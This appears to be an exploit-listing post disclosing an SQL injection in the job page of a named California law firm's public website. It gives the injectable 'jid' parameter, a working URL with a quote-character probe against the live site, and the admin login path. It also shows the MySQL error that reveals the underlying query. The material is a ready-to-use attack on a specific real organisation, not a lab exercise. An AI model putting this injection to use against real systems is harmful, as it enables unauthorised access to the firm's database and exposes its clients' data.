# Exploit Title:Fagen Friedman & Fulfrost LLP SQLi
# Date: 10 Sep 2019
# Author: H.BBF3.4 & A.BBF3.4
+++++++++++++++++++++++++
ABOUT Fagen Friedman & Fulfrost:
Fagen Friedman & Fulfrost’s attorneys are leaders in their fields and diverse in experience, education and interests. Our firm offers comprehensive legal services to school districts, county offices of education, Special Education Local Plan Areas, and community colleges.
Fagen Friedman & Fulfrost LLP "F3" represents nearly 400 of California's educational institutions and related agencies. These institutions include school districts, community college districts, SELPAs, county offices of education and public agencies.
++++++++++++++++++++++++++
# SQL Injection Exploit :
**********************
job.php?jid=
# Example Vulnerable Sites :
*************************
[+] https://www.f3law.com/job.php?jid=9%27
admin login:
https://www.f3law.com/admin/
# Example SQL Database Error :
****************************
ERROR: Select Sidebars
MySQL said: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND s.active = 'Y' ORDER BY sort_order' at line 4
Query: SELECT * FROM sidebars s INNER JOIN sidebars_jobs sp ON s.sidebar_id = sp.sidebar_id WHERE sp.idjob_post = 9' AND s.active = 'Y' ORDER BY sort_order;